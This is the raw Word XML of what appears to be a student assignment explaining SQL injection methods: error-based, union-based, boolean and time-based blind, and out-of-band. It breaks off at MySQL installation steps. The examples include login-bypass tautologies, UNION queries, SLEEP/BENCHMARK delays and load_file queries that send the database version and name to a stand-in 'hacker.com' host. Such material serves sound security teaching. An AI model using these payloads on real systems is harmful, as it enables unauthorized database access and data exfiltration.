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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="073763"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="073763"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIMULATION OF SQL INJECTION ATTACK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="073763"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">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a. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Title of the assignment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="0b5394"/>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Simulation of SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">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line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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color w:val="0b5394"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">b.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection Attack and its various methods:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numP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SQL Injection is a technique that allows an adversary to insert arbitrary SQL commands in the queries that a web application makes to its database. It can work on vulnerable web pages  and apps that use a backend database like MySQL, Oracle etc.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numP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is one of the most dangerous vulnerabilities a web application can be prone to. If a user’s input is being passed invalidated and un-sanitized as part of an SQL query, the user can manipulate the query itself and force it to return different data than what it was supposed to return.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="2b3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A successful attack can lead to unauthorized access to sensitive information in the database or to modifying entries (add/delete/update), depending on the type of the affected database. It also may be possible to use SQL Injection to bypass authentication and authorization in the application, shut down or even delete the entire database</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="2b3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="2b3033"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="0b5394"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Various methods of SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clea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In-Band SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:shd w:fill="ffffff"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attacker uses the same channel of communication to launch their attacks and to gather their results. In-band SQL injection’s simplicity and efficiency make it one of the most common types of SQLi attack. There are two sub-variations of this method:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:shd w:fill="ffffff"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  Error Based SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - the attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">
      <w:pPr>
        <w:shd w:fill="ffffff"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Using comment line to cause the database to ignore a part of a valid query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:shd w:fill="ffffff"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from stores where product_id = blah’ or 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(everything after this will be neglected)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:shd w:fill="ffffff"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strings which always evaluate to be true, like ‘1’ = ‘1’ ‘a’ = ‘a’, etc., using them in the query to create constantly true conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">E.g.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Select * from users where username=’blah’ or ‘a’=’a’ -- and password=’pass’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:shd w:fill="ffffff"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Union Based SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - this technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clea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union command in SQL query to execute additional queries; thereby, modifying/inserting/deleting or dropping the contents of the table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">E.g. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from stores where product_id=1 union select 1,database(),user(),4#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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Stored procedures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Creating malicious inputs to execute malicious queries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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Incorrect queries:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Coming up with logically incorrect queries to see the error messages to get more information about the target database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from stores where id=1’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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query will result in a syntax error and might reveal the backend database type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:before="280" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_np590vj7es2y" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inferential (Blind) SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:spacing w:after="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attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure. This method is called blind SQLi because the data is not transferred from the website database to the attacker, thus the attacker cannot see information about the attack in-band.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 SQL injections rely on the response and behavioral patterns of the server so they are typically slower to execute but may be just as harmful. This is a type of SQL injection where we don’t have a clue as to whether the web application is vulnerable to injection attack or not.  Blind SQL injections can be classified as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">i.  Boolean SQL Injection Attack </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- that attacker sends a SQL query to the database prompting the application to return a result. The result will vary depending on whether the query is true or false. Attackers should try to generate logically correct queries because only correct queries show the result, wrong queries do not return anything. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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suppose the original query to the database is</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shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from users where id=’id.txt’</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give blah’ and 1=1# as input which evaluates to be a right query</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d1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from users where id=’blah’ or 1=1#</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will see the user results.</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give blah’ and 1=2# as input which is a wrong query then we don’t see any results.</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shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Select * from users where id=’blah’ or 1=2#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Time Based SQL Injection Attack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ttacker sends a SQL query to the database, which makes the database wait (for a period in seconds) before it can react. The attacker can see from the time the database takes to respond, whether a query is true or false. Based on the result, if that condition is satisfied, we can observe the time delay; thereby, concluding that the input we gave produced a positive result. This is a time consuming process.</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SLEEP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BENCHMARK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expr</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) functions are used in MYSQL to pause the execution of query</w:t>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Resulting query (with malicious SLEEP injected)</w:t>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ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM products WHERE id=1-SLEEP(15)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Resulting query (with malicious BENCHMARK injected)</w:t>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ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM products WHERE id = 1-BENCHMARK(100000000, rand());</w:t>
      </w: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Out - of - Band SQL Injection Attack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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attacker can only carry out this form of attack when certain features are enabled on the database server used by the web application. This form of attack is primarily used as an alternative to the in-band and inferential SQLi techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Out-of-band SQLi is performed when the attacker can’t use the same channel to launch the attack and gather information, or when a server is too slow or unstable for these actions to be performed. These techniques count on the capacity of the server to create DNS or HTTP  requests to transfer data to an attacker. To exploiting OOB SQL injection, the targeted web and database servers should fulfill the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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input validation on web application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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environment to allow targeted database server to initiate outbound request (either DNS or HTTP) to public without restriction of security perimeters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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Sufficient privileges to execute the necessary function to initiate outbound request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting information about MYSQL database, an attacker can user these queries:                                                           Database version:                                                                                                                                                                              </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1’;select load_file(concat(‘\\\\’,version(),’.hacker.com\\s.txt’));</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                  Database Name:                                                                                                                                                                        </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="ead1dc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1’;select load_file(concat(‘\\\\’,database(),’.hacker.com\\s.txt’));</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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c.  Installation Steps for System Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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b w:val="1"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Platform :</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="313131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operating System: Ubuntu 18.04</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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13131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MYSQL Server and its Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:before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13131"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MYSQL Installation -   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>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13131"/>
          <w:sz w:val="24"/>
